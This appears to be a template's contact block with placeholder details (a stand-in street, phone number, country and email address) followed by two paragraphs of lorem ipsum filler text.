    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.